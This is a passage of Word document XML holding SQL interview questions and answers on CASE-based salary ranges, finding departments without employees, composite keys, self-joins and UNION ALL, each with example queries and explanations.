    </w:p>
    <w:p w14:paraId="16D5C47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name, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DFE2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2501225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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378F354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90 THEN 'greater than 90'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BFBBE3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50 THEN 'greater than 50'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BBDF4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10 THEN 'less than 50'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697258B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less than 10'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C2A38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percentage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600912B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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5720D78B"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1F9C5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 Statement</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This is used to categorize the salary into different ranges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060CC129"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90 THEN 'greater than 90': This condition checks if the salary is greater than 90.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325AF58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50 THEN 'greater than 50': This checks if the salary is greater than 50 but less than or equal to 90.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6689CEEC"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10 THEN 'less than 50': This checks if the salary is greater than or equal to 10 but less than or equal to 50.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD42B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LSE 'less than 10': This condition is for salaries less than 10.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198BDE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 Statement</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Retrieves the id, name, salary, and the calculated percentage based on the salary range.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F188F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3E2167C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602"/>
        <w:gridCol w:w="1463"/>
      </w:tblGrid>
      <w:tr w:rsidR="001907E9" w:rsidRPr="005C1C9E" w14:paraId="42A9CDD0" w14:textId="77777777" w:rsidTr="001907E9">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2296AED5"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9BDF90C"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580808C4"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7452503"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ercentage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001907E9" w:rsidRPr="005C1C9E" w14:paraId="366EFA82" w14:textId="77777777" w:rsidTr="001907E9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="074989B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B35139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c>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2E3C4C3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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A457A3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90</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001907E9" w:rsidRPr="005C1C9E" w14:paraId="3163B0A1" w14:textId="77777777" w:rsidTr="001907E9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A8D153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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="717467A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E</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="19B8543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70</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F84B6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1C7426FC" w14:textId="77777777" w:rsidTr="001907E9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="587BD1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13054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D</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5620B4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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3FB84D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507CFC73" w14:textId="77777777" w:rsidTr="001907E9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F08614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F88781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c>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="61741D5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3E97614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50</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001907E9" w:rsidRPr="005C1C9E" w14:paraId="64BF3824" w14:textId="77777777" w:rsidTr="001907E9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="65ED9F1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67FC407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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="534207A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72C2CC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r w:rsidR="001907E9" w:rsidRPr="005C1C9E" w14:paraId="1E34E6AA" w14:textId="77777777" w:rsidTr="001907E9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="16D9B97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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="39ACAB6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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="303939F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1E7233A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bl>
    <w:p w14:paraId="6E81BC6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SQL query successfully categorizes employees into their respective salary ranges as requested.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743A9BDA" w14:textId="350A082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3284" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="019ED52E" w14:textId="77AA2796" w:rsidR="00564F5D" w:rsidRPr="00CE4B95" w:rsidRDefault="00A57825">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="806" w:name="_Toc197868020"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL </w:t>
      </w:r>
      <w:r w:rsidR="001907E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907E9" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>- F</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>ind the department name who does not have an employee? (Employee and Department table given)</w:t>
      </w:r>
      <w:r w:rsidR="00564F5D" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="806"/>
    </w:p>
    <w:p w14:paraId="4AA319B9" w14:textId="181AA5D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department name that does not have an employee,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match employees with their departments and then filter the result to only include departments without any employees.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1EA4B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28A32BB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d.department_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D127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Departments d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70DBDA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s e ON d.id = e.department_id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D60240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HERE e.employee_id IS NULL;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5378B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94AB9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will return all records from the Departments table, and the matched records from the Employees table. If there is no match, the result is NULL for columns from the Employees table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B0E17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e.employee_id IS NULL</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This filters the results to only include departments that have no employees (i.e., where there is no matching employee_id).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C6E5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075A8ED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department names that do not have any employees.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E72DE4D" w14:textId="72E222E6" w:rsidR="00564F5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3285" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C6FBF4" w14:textId="5DC1926D" w:rsidR="00564F5D" w:rsidRPr="00CE4B95" w:rsidRDefault="00701CCE">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="807" w:name="_Toc197868021"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the Composite key</w:t>
      </w:r>
      <w:r w:rsidR="00564F5D" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="807"/>
    </w:p>
    <w:p w14:paraId="6AA4A290" w14:textId="752578EA"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mposite Key</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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3C85BB2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ultiple Columns</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A composite key is made up of multiple columns. Each individual column in the composite key may not be unique, but together they form a unique identifier for a record.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7168F63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Key</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Composite keys are often used as a primary key in a table when a single field is not enough to uniquely identify a record.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62BBA2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ness</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The combination of the values in the composite key columns must be unique across the table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5347C4B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0351D2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_Course (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CAE2C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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E5AFE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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26992F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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DCF1FE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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E07FE9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3BDE11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6671C05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56E79BE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Many-to-many relationships: Like the example above, composite keys are often used in junction tables to represent many-to-many relationships.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5529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Historical data tracking: In cases where you track historical changes, you may use composite keys made up of fields like start_date and end_date to ensure uniqueness.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7418085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904EFA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composite key is a powerful way to ensure uniqueness when a single column is not sufficient, and it helps in modeling complex relationships in databases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534A5B42" w14:textId="3F47467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3286" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A74B6B" w14:textId="4FFBEB1D" w:rsidR="00564F5D" w:rsidRPr="00CE4B95" w:rsidRDefault="00701CCE">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="808" w:name="_Toc197868022"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">What is </w:t>
      </w:r>
      <w:r w:rsidR="003A4D19" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Self-join</w:t>
      </w:r>
      <w:r w:rsidR="00564F5D" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="808"/>
    </w:p>
    <w:p w14:paraId="6517BC30" w14:textId="367143B7"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elf-join</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a type of join where a table is joined with itself. It is used when you need to combine rows within the same table based on a related column.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9B67A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6E5942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ame Table</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A self-join is performed on the same table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007114A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ases</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Since we are joining the table to itself, we typically use table aliases to distinguish between the two instances of the table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D33046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 It is useful when there is a hierarchical relationship within the table or when we need to compare rows within the same table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793C5E7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Scenario:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C012DC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686"/>
        <w:gridCol w:w="1165"/>
      </w:tblGrid>
      <w:tr w:rsidR="003A4D19" w:rsidRPr="005C1C9E" w14:paraId="098A0180" w14:textId="77777777" w:rsidTr="003A4D19">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="10C2FB6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d</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2333DB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82A1E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id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A4D19" w:rsidRPr="005C1C9E" w14:paraId="7B7E33CE" w14:textId="77777777" w:rsidTr="003A4D19">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E68322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E5944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51A9D5D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1773FC11" w14:textId="77777777" w:rsidTr="003A4D19">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="339672B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DBB297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031F44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445B52BC" w14:textId="77777777" w:rsidTr="003A4D19">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5799D03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2D5FD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267728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77871DC1" w14:textId="77777777" w:rsidTr="003A4D19">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E81C1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52F878F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214538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bl>
    <w:p w14:paraId="158D782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elf-join SQL Query:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F47B14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o get a list of employees along with their manager's name:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C680E3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1.name AS employee_name, e2.name AS manager_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF51F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1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD0F50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 e2 ON e1.manager_id = e2.employee_id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4755D2C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28515E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use two aliases (e1 and e2) for the same Employee table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A737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e1 represents the employee, and e2 represents the manager (the second instance of the Employee table).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5800AD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join the table on e1.manager_id = e2.employee_id to get the manager for each employee.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D10F51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LEFT JOIN ensures that even employees without managers (like John) will be included, with NULL as their manager's name.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E974E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509"/>
      </w:tblGrid>
      <w:tr w:rsidR="003A4D19" w:rsidRPr="005C1C9E" w14:paraId="40EC41B5" w14:textId="77777777" w:rsidTr="003A4D19">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0DB5A620"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name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0CB2C2E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name</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A4D19" w:rsidRPr="005C1C9E" w14:paraId="09A0CCBF" w14:textId="77777777" w:rsidTr="003A4D19">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="42A1872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49CAF18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68922912" w14:textId="77777777" w:rsidTr="003A4D19">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="78DB62C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136A1A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581E1FDE" w14:textId="77777777" w:rsidTr="003A4D19">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4A3E7D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5A53B3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0C13301F" w14:textId="77777777" w:rsidTr="003A4D19">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="16B96A5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6230FA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r>
    </w:tbl>
    <w:p w14:paraId="5729C2F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of Self-Join:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782976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ierarchical Data</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: For example, an employee-manager relationship or parent-child relationships.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69ABD8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arison within the Same Table</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When comparing records within the same table, such as comparing an employee's salary with others in the same department.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A4AF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Duplication</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: To find records in a table that match with others under certain conditions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F4749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6529782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self-join allows you to retrieve data from a table by joining it with itself. It is a powerful technique when dealing with hierarchical or relational data within the same table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712376F8" w14:textId="0B7E3752"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3287" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="668A5E3E" w14:textId="5201BFEC" w:rsidR="00564F5D" w:rsidRPr="00CE4B95" w:rsidRDefault="003A4D19">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="809" w:name="_Toc197868023"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">SQL Query - </w:t>
      </w:r>
      <w:r w:rsidR="00701CCE" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>We have Table A (2 columns and 4 rows) and Table B (2 columns and 4 rows) and I want to print all 8 rows? Write a query for it? (Use Union All)</w:t>
      </w:r>
      <w:r w:rsidR="00564F5D" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="809"/>
    </w:p>
    <w:p w14:paraId="6C3C5C67" w14:textId="63B366C6" w:rsidR="003A4D19" w:rsidRPr="005C1C9E" w:rsidRDefault="003A4D19"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print all 8 rows from both Table A and Table B using the UNION ALL operator, you can write the following SQL query:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B1D08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Query:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A99C7A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A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588D07C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56FC99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B;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C95621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9E134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This selects all columns from both TableA and TableB.</w:t>
      </w:r>
